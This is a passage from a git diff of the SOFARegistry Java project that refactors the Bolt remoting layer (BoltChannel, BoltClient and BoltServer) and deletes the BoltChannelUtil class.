boltChannel.setAsyncContext(asyncCtx); - boltChannel.setConnection(bizCtx.getConnection()); - try { - if (userProcessorHandler != null) { - userProcessorHandler.received(boltChannel, request); - } - } catch (Exception e) { - LOGGER.error("Handle request error!", e); - throw new RuntimeException("Handle request error!", e); - } + @Override + public void handleRequest(BizContext bizCtx, AsyncContext asyncCtx, Object request) { + try { + BoltChannel boltChannel = new BoltChannel(bizCtx.getConnection()); + boltChannel.setAsyncContext(asyncCtx); + userProcessorHandler.received(boltChannel, request); + } catch (Throwable e) { + LOGGER.error("Handle request error!", e); + throw new RuntimeException("Handle request error!", e); } + } - @Override - public Object handleRequest(BizContext bizCtx, Object request) throws Exception { - return super.handleRequest(bizCtx, request); + @Override + public String interest() { + if (userProcessorHandler.interest() != null) { + return userProcessorHandler.interest().getName(); } - @Override - public String interest() { - if (userProcessorHandler != null && userProcessorHandler.interest() != null) { - return userProcessorHandler.interest().getName(); - } + return null; + } - return null; - } - - @Override - public Executor getExecutor() { - return userProcessorHandler.getExecutor(); - } -} \ No newline at end of file + @Override + public Executor getExecutor() { + return userProcessorHandler.getExecutor(); + } +} diff --git a/server/remoting/bolt/src/main/java/com/alipay/sofa/registry/remoting/bolt/BoltChannel.java b/server/remoting/bolt/src/main/java/com/alipay/sofa/registry/remoting/bolt/BoltChannel.java index 0e857268d..5c361a7d6 100644 --- a/server/remoting/bolt/src/main/java/com/alipay/sofa/registry/remoting/bolt/BoltChannel.java +++ b/server/remoting/bolt/src/main/java/com/alipay/sofa/registry/remoting/bolt/BoltChannel.java @@ -20,121 +20,120 @@ import com.alipay.remoting.BizContext; import com.alipay.remoting.Connection; import com.alipay.sofa.registry.remoting.Channel; - -import javax.ws.rs.client.WebTarget; import java.net.InetSocketAddress; +import java.util.HashMap; import java.util.Map; -import java.util.concurrent.ConcurrentHashMap; +import javax.ws.rs.client.WebTarget; /** - * * @author shangyu.wh + * @author kezhu.wukz * @version $Id: BoltChannel.java, v 0.1 2017-11-24 16:46 shangyu.wh Exp $ */ public class BoltChannel implements Channel { - private Connection connection; - - private AsyncContext asyncContext; - - private BizContext bizContext; - - private final Map attributes = new ConcurrentHashMap<>(); - - @Override - public InetSocketAddress getRemoteAddress() { - if (connection != null) { - return connection.getRemoteAddress(); - } - return null; - } - - @Override - public InetSocketAddress getLocalAddress() { - if (connection != null) { - return connection.getLocalAddress(); - } - return null; - } + private final Connection connection; - @Override - public boolean isConnected() { - if (connection != null) { - return connection.isFine(); - } - return false; - } + private AsyncContext asyncContext; - @Override - public Object getAttribute(String key) { - return attributes.get(key); - } + private BizContext bizContext; - @Override - public void setAttribute(String key, Object value) { - if (value == null) { // The null value unallowed in the ConcurrentHashMap. - attributes.remove(key); - } else { - attributes.put(key, value); - } - } + private Map attributes; - @Override - public WebTarget getWebTarget() { - return null; - } + public BoltChannel(Connection conn) { + this.connection = conn; + } - /** - * Getter method for property connection. - * - * @return property value of connection - */ - public Connection getConnection() { - return connection; - } + @Override + public InetSocketAddress getRemoteAddress() { + return connection.getRemoteAddress(); + } - /** - * Setter method for property connection. - * - * @param connection value to be assigned to property connection - */ - public void setConnection(Connection connection) { - this.connection = connection; - } + @Override + public InetSocketAddress getLocalAddress() { + return connection.getLocalAddress(); + } - /** - * Getter method for property asyncContext. - * - * @return property value of asyncContext - */ - public AsyncContext getAsyncContext() { - return asyncContext; - } + @Override + public boolean isConnected() { + return connection.isFine(); + } - /** - * Setter method for property asyncContext. - * - * @param asyncContext value to be assigned to property asyncContext - */ - public void setAsyncContext(AsyncContext asyncContext) { - this.asyncContext = asyncContext; - } + @Override + public synchronized Object getAttribute(String key) { + return attributes == null ? null : attributes.get(key); + } - /** - * Getter method for property bizContext. - * - * @return property value of bizContext - */ - public BizContext getBizContext() { - return bizContext; + @Override + public synchronized void setAttribute(String key, Object value) { + if (attributes == null) { + attributes = new HashMap<>(); } - - /** - * Setter method for property bizContext. - * - * @param bizContext value to be assigned to property bizContext - */ - public void setBizContext(BizContext bizContext) { - this.bizContext = bizContext; + if (value == null) { // The null value unallowed in the ConcurrentHashMap. + attributes.remove(key); + } else { + attributes.put(key, value); } -} \ No newline at end of file + } + + @Override + public WebTarget getWebTarget() { + return null; + } + + @Override + public void close() { + this.connection.close(); + } + + /** + * Getter method for property connection. + * + * @return property value of connection + */ + public Connection getConnection() { + return connection; + } + + /** + * Getter method for property asyncContext. + * + * @return property value of asyncContext + */ + public AsyncContext getAsyncContext() { + return asyncContext; + } + + /** + * Setter method for property asyncContext. + * + * @param asyncContext value to be assigned to property asyncContext + */ + public void setAsyncContext(AsyncContext asyncContext) { + this.asyncContext = asyncContext; + } + + /** + * Getter method for property bizContext. + * + * @return property value of bizContext + */ + public BizContext getBizContext() { + return bizContext; + } + + /** + * Setter method for property bizContext. + * + * @param bizContext value to be assigned to property bizContext + */ + public void setBizContext(BizContext bizContext) { + this.bizContext = bizContext; + } + + @Override + public String toString() { + return String.format( + "connected=%s, remote=%s, local=%s", isConnected(), getRemoteAddress(), getLocalAddress()); + } +} diff --git a/server/remoting/bolt/src/main/java/com/alipay/sofa/registry/remoting/bolt/BoltChannelUtil.java b/server/remoting/bolt/src/main/java/com/alipay/sofa/registry/remoting/bolt/BoltChannelUtil.java deleted file mode 100644 index aeb81a629..000000000 --- a/server/remoting/bolt/src/main/java/com/alipay/sofa/registry/remoting/bolt/BoltChannelUtil.java +++ /dev/null @@ -1,49 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.remoting.bolt; - -import com.alipay.remoting.InvokeContext; -import com.alipay.sofa.registry.remoting.Channel; - -/** - * @author xuanbei - * @since 2019/2/15 - */ -public class BoltChannelUtil { - public static Byte getBoltCustomSerializer(Channel channel) { - if (channel instanceof BoltChannel) { - BoltChannel boltChannel = (BoltChannel) channel; - InvokeContext invokeContext = boltChannel.getBizContext().getInvokeContext(); - - if (null != invokeContext) { - // set client custom codec for request command if not null - Object clientCustomCodec = invokeContext.get(InvokeContext.BOLT_CUSTOM_SERIALIZER); - if (null != clientCustomCodec) { - try { - return (Byte) clientCustomCodec; - } catch (ClassCastException e) { - throw new IllegalArgumentException( - "Illegal custom codec [" + clientCustomCodec - + "], the type of value should be [byte], but now is [" - + clientCustomCodec.getClass().getName() + "]."); - } - } - } - } - return null; - } -} diff --git a/server/remoting/bolt/src/main/java/com/alipay/sofa/registry/remoting/bolt/BoltClient.java b/server/remoting/bolt/src/main/java/com/alipay/sofa/registry/remoting/bolt/BoltClient.java index ad09d9b31..7daed9714 100644 --- a/server/remoting/bolt/src/main/java/com/alipay/sofa/registry/remoting/bolt/BoltClient.java +++ b/server/remoting/bolt/src/main/java/com/alipay/sofa/registry/remoting/bolt/BoltClient.java @@ -16,11 +16,11 @@ */ package com.alipay.sofa.registry.remoting.bolt; -import com.alipay.remoting.Connection; -import com.alipay.remoting.ConnectionEventType; -import com.alipay.remoting.InvokeCallback; +import com.alipay.remoting.*; +import com.alipay.remoting.config.Configs; import com.alipay.remoting.exception.RemotingException; import com.alipay.remoting.rpc.RpcClient; +import com.alipay.remoting.rpc.protocol.RpcProtocol; import com.alipay.sofa.registry.common.model.store.URL; import com.alipay.sofa.registry.log.Logger; import com.alipay.sofa.registry.log.LoggerFactory; @@ -31,299 +31,191 @@ import com.alipay.sofa.registry.remoting.ChannelHandler.HandlerType; import com.alipay.sofa.registry.remoting.ChannelHandler.InvokeType; import com.alipay.sofa.registry.remoting.Client; - import java.net.InetSocketAddress; -import java.util.ArrayList; -import java.util.Collection; -import java.util.HashMap; -import java.util.HashSet; import java.util.List; import java.util.Map; -import java.util.concurrent.Executor; import java.util.concurrent.atomic.AtomicBoolean; /** * The type Bolt client. + * + * @author kezhu.wukz * @author shangyu.wh * @version $Id : BoltClient.java, v 0.1 2017-11-27 14:46 shangyu.wh Exp $ */ public class BoltClient implements Client { - private static final Logger LOGGER = LoggerFactory.getLogger(BoltClient.class); - private RpcClient boltClient; - private List channelHandlers = new ArrayList<>(); - private Map channels = new HashMap<>(); - private AtomicBoolean initHandler = new AtomicBoolean(false); - - /** - * Instantiates a new Bolt client. - */ - public BoltClient() { - boltClient = new RpcClient(); - boltClient.init(); - } - - @Override - public Channel connect(URL targetUrl) { - - if (targetUrl == null) { - throw new IllegalArgumentException("Create connection targetUrl can not be null!"); - } - InetSocketAddress address = URL.toInetSocketAddress(targetUrl); - Channel c = getChannel(address); - if (c != null && c.isConnected()) { - LOGGER.info("Target url:" + targetUrl + " has been connected!", targetUrl); - return c; - } - - initHandler(); - - try { - Connection connection = boltClient - .getConnection(NetUtil.toAddressString(address), 1000); - if (connection != null) { - BoltChannel channel = new BoltChannel(); - channel.setConnection(connection); - channels.put(connection.getUrl().getOriginUrl(), channel); - return channel; - } else { - throw new RuntimeException("Bolt client connect server get none connection!"); - } - - } catch (RemotingException e) { - LOGGER.error("Bolt client connect server got a RemotingException! target url:" - + targetUrl, e); - throw new RuntimeException("Bolt client connect server got a RemotingException!", e); - } catch (InterruptedException e) { - LOGGER.error("Bolt client connect server has been Interrupted!", e); - throw new RuntimeException("Bolt client connect server has been Interrupted!", e); - } - } - - private void initHandler() { - - if (initHandler.compareAndSet(false, true)) { - boltClient.addConnectionEventProcessor(ConnectionEventType.CONNECT, - new ConnectionEventAdapter(ConnectionEventType.CONNECT, - getConnectionEventHandler(), null)); - boltClient.addConnectionEventProcessor(ConnectionEventType.CLOSE, - new ConnectionEventAdapter(ConnectionEventType.CLOSE, getConnectionEventHandler(), - null)); - boltClient.addConnectionEventProcessor(ConnectionEventType.EXCEPTION, - new ConnectionEventAdapter(ConnectionEventType.EXCEPTION, - getConnectionEventHandler(), null)); - - registerUserProcessorHandler(); - } - } - - private void registerUserProcessorHandler() { - if (channelHandlers != null) { - for (ChannelHandler channelHandler : channelHandlers) { - if (HandlerType.PROCESSER.equals(channelHandler.getType())) { - if (InvokeType.SYNC.equals(channelHandler.getInvokeType())) { - boltClient.registerUserProcessor(new SyncUserProcessorAdapter( - channelHandler)); - } else { - boltClient.registerUserProcessor(new AsyncUserProcessorAdapter( - channelHandler)); - } - } - } - } - } - - @Override - public Collection getChannels() { - - Collection chs = new HashSet<>(); - for (Channel channel : this.channels.values()) { - if (channel.isConnected()) { - chs.add(channel); - } else { - channels.remove(NetUtil.toAddressString(channel.getRemoteAddress())); - } - } - return chs; - } - - @Override - public Channel getChannel(InetSocketAddress remoteAddress) { - Channel c = channels.get(NetUtil.toAddressString(remoteAddress)); - if (c == null || !c.isConnected()) { - return null; - } - return c; - } - - @Override - public Channel getChannel(URL url) { - Channel c = channels.get(url.getAddressString()); - if (c == null || !c.isConnected()) { - return null; - } - return c; - } - - @Override - public List getChannelHandlers() { - return channelHandlers; - } - - /** - * Setter method for property channelHandlers. - * - * @param channelHandlers value to be assigned to property channelHandlers - */ - public void setChannelHandlers(List channelHandlers) { - this.channelHandlers = channelHandlers; - } - - @Override - public InetSocketAddress getLocalAddress() { - return NetUtil.getLocalSocketAddress(); - } - - /** - * Gets connection event handler. - * - * @return the connection event handler - */ - public ChannelHandler getConnectionEventHandler() { - if (channelHandlers != null) { - for (ChannelHandler channelHandler : channelHandlers) { - if (HandlerType.LISENTER.equals(channelHandler.getType())) { - return channelHandler; - } - } - } - return null; - } - - @Override - public void close() { - Collection chs = getChannels(); - if (chs != null && chs.size() > 0) { - for (Channel ch : chs) { - if (ch != null) { - boltClient.closeStandaloneConnection(((BoltChannel) ch).getConnection()); - } - } - } - } - - @Override - public void close(Channel channel) { - if (channel != null) { - Connection connection = ((BoltChannel) channel).getConnection(); - if (null != connection.getUrl() && null != connection.getUrl().getOriginUrl()) { - channels.remove(connection.getUrl().getOriginUrl()); - } - boltClient.closeStandaloneConnection(connection); - } - } - - @Override - public boolean isClosed() { - boolean ret = false; - Collection chs = getChannels(); - if (chs != null && chs.size() > 0) { - for (Channel ch : chs) { - if (ch != null && !ch.isConnected()) { - ret = true; - break; - } - } + private static final Logger LOGGER = LoggerFactory.getLogger(BoltClient.class); + + private final RpcClient rpcClient; + + private final AtomicBoolean closed = new AtomicBoolean(false); + + private int connectTimeout = 2000; + + private final int connNum; + + /** Instantiates a new Bolt client. */ + public BoltClient(int connNum) { + rpcClient = new RpcClient(); + configIO(); + rpcClient.init(); + + this.connNum = connNum; + } + + private void configIO() { + final int max = 1024 * (128 + 256); + final int low = Integer.getInteger(Configs.NETTY_BUFFER_LOW_WATERMARK, max / 2); + final int high = Integer.getInteger(Configs.NETTY_BUFFER_HIGH_WATERMARK, max); + rpcClient.initWriteBufferWaterMark(low, high); + LOGGER.info("config watermark, low={}, high={}", low, high); + } + + public Map> getConnections() { + return rpcClient.getAllManagedConnections(); + } + + /** + * Setter method for property channelHandlers. + * + * @param channelHandlers value to be assigned to property channelHandlers + */ + public void initHandlers(List channelHandlers) { + final ChannelHandler connectionEventHandler = BoltUtil.getListenerHandlers(channelHandlers); + + rpcClient.addConnectionEventProcessor( + ConnectionEventType.CONNECT, + newConnectionEventAdapter(connectionEventHandler, ConnectionEventType.CONNECT)); + rpcClient.addConnectionEventProcessor( + ConnectionEventType.CLOSE, + newConnectionEventAdapter(connectionEventHandler, ConnectionEventType.CLOSE)); + rpcClient.addConnectionEventProcessor( + ConnectionEventType.EXCEPTION, + newConnectionEventAdapter(connectionEventHandler, ConnectionEventType.EXCEPTION)); + + for (ChannelHandler channelHandler : channelHandlers) { + if (HandlerType.PROCESSER.equals(channelHandler.getType())) { + if (InvokeType.SYNC.equals(channelHandler.getInvokeType())) { + rpcClient.registerUserProcessor(newSyncProcessor(channelHandler)); } else { - //has no channels - return true; - } - return ret; - } - - @Override - public void sendOneway(Channel channel, Object message) { - if (channel != null && channel.isConnected()) { - if (channel instanceof BoltChannel) { - BoltChannel boltChannel = (BoltChannel) channel; - try { - boltClient.oneway(boltChannel.getConnection(), message); - } catch (RemotingException e) { - LOGGER.error("Bolt Client oneway request RemotingException! target url: {}", - boltChannel.getRemoteAddress(), e); - } - } + rpcClient.registerUserProcessor(newAsyncProcessor(channelHandler)); } - } - - @Override - public Object sendSync(Channel channel, Object message, int timeoutMillis) { - - if (channel != null && channel.isConnected()) { - if (channel instanceof BoltChannel) { - BoltChannel boltChannel = (BoltChannel) channel; - try { - return boltClient.invokeSync(boltChannel.getConnection(), message, - timeoutMillis); - } catch (RemotingException e) { - LOGGER.error("Bolt Client sendSync message RemotingException! target url:" - + boltChannel.getRemoteAddress(), e); - throw new RuntimeException("Bolt Client sendSync message RemotingException!", e); - } catch (InterruptedException e) { - LOGGER.error("Bolt Client sendSync message InterruptedException! target url:" - + boltChannel.getRemoteAddress(), e); - throw new RuntimeException( - "Bolt Client sendSync message InterruptedException!", e); - } - } else { - throw new IllegalArgumentException("Input channel instance error! instance class:" - + channel.getClass().getName()); - } + } + } + } + + protected ConnectionEventProcessor newConnectionEventAdapter( + ChannelHandler connectionEventHandler, ConnectionEventType connectEventType) { + return new ConnectionEventAdapter(connectEventType, connectionEventHandler); + } + + protected AsyncUserProcessorAdapter newAsyncProcessor(ChannelHandler channelHandler) { + return new AsyncUserProcessorAdapter(channelHandler); + } + + protected SyncUserProcessorAdapter newSyncProcessor(ChannelHandler channelHandler) { + return new SyncUserProcessorAdapter(channelHandler); + } + + @Override + public Channel connect(URL url) { + if (url == null) { + throw new IllegalArgumentException("Create connection url can not be null!"); + } + try { + Connection connection = getBoltConnection(rpcClient, url); + return new BoltChannel(connection); + } catch (Throwable e) { + throw BoltUtil.handleException("BoltClient", url, e, "connect"); + } + } + + protected Connection getBoltConnection(RpcClient rpcClient, URL url) throws RemotingException { + Url boltUrl = createBoltUrl(url); + try { + Connection connection = rpcClient.getConnection(boltUrl, connectTimeout); + if (connection == null || !connection.isFine()) { + if (connection != null) { + connection.close(); } - throw new IllegalArgumentException( - "Input channel: " + channel - + " error! channel cannot be null,or channel must be connected!"); - } - - @Override - public void sendCallback(Channel channel, Object message, CallbackHandler callbackHandler, - int timeoutMillis) { - if (channel != null && channel.isConnected()) { - if (channel instanceof BoltChannel) { - BoltChannel boltChannel = (BoltChannel) channel; - try { - boltClient.invokeWithCallback(boltChannel.getConnection(), message, - new InvokeCallback() { - - @Override - public void onResponse(Object result) { - callbackHandler.onCallback(channel, result); - } - - @Override - public void onException(Throwable e) { - callbackHandler.onException(channel, e); - } - - @Override - public Executor getExecutor() { - return null; - } - }, timeoutMillis); - return; - } catch (RemotingException e) { - LOGGER.error("Bolt Client sendSync message RemotingException! target url:" - + boltChannel.getRemoteAddress(), e); - throw new RuntimeException("Bolt Client sendSync message RemotingException!", e); - } - } else { - throw new IllegalArgumentException("Input channel instance error! instance class:" - + channel.getClass().getName()); - } - } - throw new IllegalArgumentException( - "Input channel: " + channel - + " error! channel cannot be null,or channel must be connected!"); - } - -} \ No newline at end of file + throw new RemotingException("Get bolt connection failed for boltUrl: " + boltUrl); + } + return connection; + } catch (InterruptedException e) { + throw BoltUtil.handleException("BoltClient", boltUrl, e, "getConnection"); + } + } + + protected Url createBoltUrl(URL url) { + Url boltUrl = new Url(url.getIpAddress(), url.getPort()); + boltUrl.setProtocol(RpcProtocol.PROTOCOL_CODE); + boltUrl.setConnNum(connNum); + boltUrl.setConnWarmup(true); + return boltUrl; + } + + @Override + public Channel getChannel(URL url) { + try { + Connection connection = getBoltConnection(rpcClient, url); + BoltChannel channel = new BoltChannel(connection); + return channel; + } catch (Throwable e) { + throw BoltUtil.handleException("BoltClient", url, e, "getChannel"); + } + } + + @Override + public InetSocketAddress getLocalAddress() { + return NetUtil.getLocalSocketAddress(); + } + + @Override + public void close() { + if (closed.compareAndSet(false, true)) { + rpcClient.shutdown(); + } + } + + @Override + public boolean isClosed() { + return closed.get(); + } + + @Override + public Object sendSync(URL url, Object message, int timeoutMillis) { + try { + Url boltUrl = createBoltUrl(url); + return rpcClient.invokeSync(boltUrl, message, timeoutMillis); + } catch (Throwable e) { + throw BoltUtil.handleException("BoltClient", url, e, "sendSync"); + } + } + + @Override + public Object sendSync(Channel channel, Object message, int timeoutMillis) { + BoltUtil.checkChannelConnected(channel); + try { + return rpcClient.invokeSync(((BoltChannel) channel).getConnection(), message, timeoutMillis); + } catch (Throwable e) { + throw BoltUtil.handleException("BoltClient", channel, e, "sendSync"); + } + } + + @Override + public void sendCallback( + URL url, Object message, CallbackHandler callbackHandler, int timeoutMillis) { + try { + Connection connection = getBoltConnection(rpcClient, url); + rpcClient.invokeWithCallback( + connection, + message, + new InvokeCallbackHandler(new BoltChannel(connection), callbackHandler), + timeoutMillis); + return; + } catch (RemotingException e) { + throw BoltUtil.handleException("BoltClient", url, e, "sendCallback"); + } + } +} diff --git a/server/remoting/bolt/src/main/java/com/alipay/sofa/registry/remoting/bolt/BoltServer.java b/server/remoting/bolt/src/main/java/com/alipay/sofa/registry/remoting/bolt/BoltServer.java index e9fc9ed38..da61f85de 100644 --- a/server/remoting/bolt/src/main/java/com/alipay/sofa/registry/remoting/bolt/BoltServer.java +++ b/server/remoting/bolt/src/main/java/com/alipay/sofa/registry/remoting/bolt/BoltServer.java @@ -16,330 +16,279 @@ */ package com.alipay.sofa.registry.remoting.bolt; -import com.alipay.remoting.Connection; -import com.alipay.remoting.ConnectionEventType; -import com.alipay.remoting.InvokeCallback; -import com.alipay.remoting.Url; -import com.alipay.remoting.exception.RemotingException; +import com.alipay.remoting.*; import com.alipay.remoting.rpc.RpcServer; +import com.alipay.remoting.rpc.protocol.AsyncUserProcessor; +import com.alipay.remoting.rpc.protocol.SyncUserProcessor; import com.alipay.sofa.registry.common.model.store.URL; import com.alipay.sofa.registry.log.Logger; import com.alipay.sofa.registry.log.LoggerFactory; -import com.alipay.sofa.registry.net.NetUtil; import com.alipay.sofa.registry.remoting.CallbackHandler; import com.alipay.sofa.registry.remoting.Channel; import com.alipay.sofa.registry.remoting.ChannelHandler; import com.alipay.sofa.registry.remoting.ChannelHandler.HandlerType; import com.alipay.sofa.registry.remoting.ChannelHandler.InvokeType; import com.alipay.sofa.registry.remoting.Server; - +import com.alipay.sofa.registry.util.CollectionUtils; +import com.google.common.collect.Lists; +import com.google.common.collect.Maps; import java.net.InetSocketAddress; import java.util.Collection; -import java.util.HashSet; -import java.util.Iterator; +import java.util.Collections; import java.util.List; import java.util.Map; -import java.util.concurrent.ConcurrentHashMap; -import java.util.concurrent.Executor; import java.util.concurrent.atomic.AtomicBoolean; /** - * * @author shangyu.wh * @version $Id: BoltServer.java, v 0.1 2017-11-24 18:05 shangyu.wh Exp $ */ public class BoltServer implements Server { - - private static final Logger LOGGER = LoggerFactory.getLogger(BoltServer.class); - - private static final Logger PUSH_LOGGER = LoggerFactory.getLogger("SESSION-PUSH", - "[Server]"); - /** - * accoding server port - * can not be null - */ - private final URL url; - private final List channelHandlers; - /** - * bolt server - */ - private RpcServer boltServer; - /** - * started status - */ - private AtomicBoolean isStarted = new AtomicBoolean(false); - private Map channels = new ConcurrentHashMap<>(); - - private AtomicBoolean initHandler = new AtomicBoolean(false); - - /** - * constructor - * @param url - * @param channelHandlers - */ - public BoltServer(URL url, List channelHandlers) { - this.channelHandlers = channelHandlers; - this.url = url; + private static final Logger LOGGER = LoggerFactory.getLogger(BoltServer.class); + + /** accoding server port can not be null */ + protected final URL url; + + private final List channelHandlers; + /** bolt server */ + private final RpcServer boltServer; + /** started status */ + private final AtomicBoolean isStarted = new AtomicBoolean(false); + + private final AtomicBoolean initHandler = new AtomicBoolean(false); + + /** + * constructor + * + * @param url + * @param channelHandlers + */ + public BoltServer(URL url, List channelHandlers) { + this.channelHandlers = channelHandlers; + this.url = url; + this.boltServer = createRpcServer(); + } + + public void configWaterMark(int low, int high) { + boltServer.initWriteBufferWaterMark(low, high); + LOGGER.info("config watermark, low={}, high={}", low, high); + } + + /** start bolt server */ + public void startServer() { + if (isStarted.compareAndSet(false, true)) { + try { + initHandler(); + boltServer.start(); + + } catch (Exception e) { + isStarted.set(false); + LOGGER.error("Start bolt server error!", e); + throw new RuntimeException("Start bolt server error!", e); + } } - - /** - * start bolt server - */ - public void startServer() { - if (isStarted.compareAndSet(false, true)) { - try { - boltServer = new RpcServer(url.getPort(), true); - initHandler(); - boltServer.start(); - - } catch (Exception e) { - isStarted.set(false); - LOGGER.error("Start bolt server error!", e); - throw new RuntimeException("Start bolt server error!", e); - } - } + } + + private void stopServer() { + if (boltServer != null && isStarted.get()) { + try { + boltServer.stop(); + } catch (Exception e) { + LOGGER.error("Stop bolt server error!", e); + throw new RuntimeException("Stop bolt server error!", e); + } } - - private void stopServer() { - if (boltServer != null && isStarted.get()) { - try { - boltServer.stop(); - } catch (Exception e) { - LOGGER.error("Stop bolt server error!", e); - throw new RuntimeException("Stop bolt server error!", e); - } - } + } + + /** just init cant start */ + public void initServer() { + try { + initHandler(); + } catch (Exception e) { + LOGGER.error("Init bolt server error!", e); + throw new RuntimeException("Init bolt server error!", e); } - - /** - * just init cant start - */ - public void initServer() { - try { - boltServer = new RpcServer(url.getPort(), true); - initHandler(); - } catch (Exception e) { - LOGGER.error("Init bolt server error!", e); - throw new RuntimeException("Init bolt server error!", e); - } + } + + protected RpcServer createRpcServer() { + return new RpcServer(url.getPort(), true); + } + + private void initHandler() { + if (initHandler.compareAndSet(false, true)) { + boltServer.addConnectionEventProcessor( + ConnectionEventType.CONNECT, newConnectionEventProcessor(ConnectionEventType.CONNECT)); + boltServer.addConnectionEventProcessor( + ConnectionEventType.CLOSE, newConnectionEventProcessor(ConnectionEventType.CLOSE)); + boltServer.addConnectionEventProcessor( + ConnectionEventType.EXCEPTION, + newConnectionEventProcessor(ConnectionEventType.EXCEPTION)); + + registerUserProcessorHandler(); } - - private void initHandler() { - if (initHandler.compareAndSet(false, true)) { - boltServer.addConnectionEventProcessor(ConnectionEventType.CONNECT, - new ConnectionEventAdapter(ConnectionEventType.CONNECT, - getConnectionEventHandler(), this)); - boltServer.addConnectionEventProcessor(ConnectionEventType.CLOSE, - new ConnectionEventAdapter(ConnectionEventType.CLOSE, getConnectionEventHandler(), - this)); - boltServer.addConnectionEventProcessor(ConnectionEventType.EXCEPTION, - new ConnectionEventAdapter(ConnectionEventType.EXCEPTION, - getConnectionEventHandler(), this)); - - registerUserProcessorHandler(); + } + + protected ConnectionEventProcessor newConnectionEventProcessor(ConnectionEventType type) { + return new ConnectionEventAdapter(type, BoltUtil.getListenerHandlers(channelHandlers)); + } + + private void registerUserProcessorHandler() { + for (ChannelHandler channelHandler : channelHandlers) { + if (HandlerType.PROCESSER.equals(channelHandler.getType())) { + if (InvokeType.SYNC.equals(channelHandler.getInvokeType())) { + boltServer.registerUserProcessor(newSyncUserProcessorAdapter(channelHandler)); + } else { + boltServer.registerUserProcessor(newAsyncUserProcessorAdapter(channelHandler)); } + } } - - private ChannelHandler getConnectionEventHandler() { - if (channelHandlers != null) { - for (ChannelHandler channelHandler : channelHandlers) { - if (HandlerType.LISENTER.equals(channelHandler.getType())) { - return channelHandler; - } - } - } - return null; + } + + protected SyncUserProcessor newSyncUserProcessorAdapter(ChannelHandler channelHandler) { + return new SyncUserProcessorAdapter(channelHandler); + } + + protected AsyncUserProcessor newAsyncUserProcessorAdapter(ChannelHandler channelHandler) { + return new AsyncUserProcessorAdapter(channelHandler); + } + + @Override + public boolean isOpen() { + return isStarted.get(); + } + + @Override + public List getChannels() { + Map> conns = boltServer.getConnectionManager().getAll(); + if (conns.isEmpty()) { + return Collections.emptyList(); } - - private void registerUserProcessorHandler() { - if (channelHandlers != null) { - for (ChannelHandler channelHandler : channelHandlers) { - if (HandlerType.PROCESSER.equals(channelHandler.getType())) { - if (InvokeType.SYNC.equals(channelHandler.getInvokeType())) { - boltServer.registerUserProcessor(new SyncUserProcessorAdapter( - channelHandler)); - } else { - boltServer.registerUserProcessor(new AsyncUserProcessorAdapter( - channelHandler)); - } - } - } + List ret = Lists.newArrayListWithCapacity(128); + for (List list : conns.values()) { + for (Connection conn : list) { + if (conn.isFine()) { + BoltChannel boltChannel = new BoltChannel(conn); + ret.add(boltChannel); } + } } - - @Override - public boolean isOpen() { - return isStarted.get(); + return ret; + } + + @Override + public Map selectAvailableChannelsForHostAddress() { + Collection chnList = getChannels(); + if (chnList.isEmpty()) { + return Collections.emptyMap(); } - - @Override - public Collection getChannels() { - Collection chs = new HashSet<>(); - if (!this.channels.isEmpty()) { - for (Iterator it = this.channels.values().iterator(); it.hasNext();) { - Channel channel = it.next(); - if (channel.isConnected()) { - chs.add(channel); - } else { - it.remove(); - } - } - } - return chs; + Map> chns = Maps.newHashMapWithExpectedSize(128); + for (Channel chn : chnList) { + List list = + chns.computeIfAbsent( + chn.getRemoteAddress().getAddress().getHostAddress(), k -> Lists.newArrayList()); + list.add(chn); } - - @Override - public Channel getChannel(InetSocketAddress remoteAddress) { - Channel channel = channels.get(NetUtil.toAddressString(remoteAddress)); - if (channel != null && channel.isConnected()) { - return channel; - } - return null; + Map ret = Maps.newHashMapWithExpectedSize(chns.size()); + for (Map.Entry> e : chns.entrySet()) { + List list = e.getValue(); + ret.put(e.getKey(), CollectionUtils.getRandom(list)); } - - @Override - public Channel getChannel(URL url) { - Channel channel = channels.get(url.getAddressString()); - if (channel != null && channel.isConnected()) { - return channel; - } - return null; + return ret; + } + + @Override + public Channel getChannel(InetSocketAddress remoteAddress) { + URL url = new URL(remoteAddress.getAddress().getHostAddress(), remoteAddress.getPort()); + return getChannel(url); + } + + @Override + public Channel getChannel(URL url) { + Url key = new Url(url.getIpAddress(), url.getPort()); + Connection conn = boltServer.getConnectionManager().get(key.getUniqueKey()); + if (conn == null) { + return null; } - - @Override - public List getChannelHandlers() { - return channelHandlers; + return new BoltChannel(conn); + } + + @Override + public InetSocketAddress getLocalAddress() { + return new InetSocketAddress(url.getPort()); + } + + @Override + public void close() { + if (isStarted.compareAndSet(true, false)) { + stopServer(); } + } - @Override - public InetSocketAddress getLocalAddress() { - return new InetSocketAddress(url.getPort()); + @Override + public void close(Channel channel) { + if (channel == null) { + return; } - - @Override - public void close() { - if (isStarted.compareAndSet(true, false)) { - stopServer(); - } - } - - @Override - public void close(Channel channel) { - if (null != channel) { - channels.remove(NetUtil.toAddressString(channel.getRemoteAddress())); - BoltChannel boltChannel = (BoltChannel) channel; - Connection connection = boltChannel.getConnection(); - if (null != connection && connection.isFine()) { - connection.close(); - } - } + BoltChannel boltChannel = (BoltChannel) channel; + Connection connection = boltChannel.getConnection(); + if (connection.isFine()) { + connection.close(); } - - @Override - public boolean isClosed() { - return !isStarted.get(); + } + + @Override + public boolean isClosed() { + return !isStarted.get(); + } + + @Override + public Object sendSync(Channel channel, Object message, int timeoutMillis) { + BoltUtil.checkChannelConnected(channel); + try { + Url boltUrl = BoltUtil.createTargetUrl(channel); + return boltServer.invokeSync(boltUrl, message, newInvokeContext(message), timeoutMillis); + } catch (Throwable e) { + throw BoltUtil.handleException("BoltServer", channel, e, "sendSync"); } - - @Override - public void sendOneway(Channel channel, Object message) { - if (channel != null && channel.isConnected()) { - try { - Url url = new Url(channel.getRemoteAddress().getAddress().getHostAddress(), channel - .getRemoteAddress().getPort()); - - if (LOGGER.isDebugEnabled()) { - LOGGER.debug("Bolt Server one way message:{} , target url:{}", message, url); - } - boltServer.oneway(url, message); - } catch (RemotingException e) { - 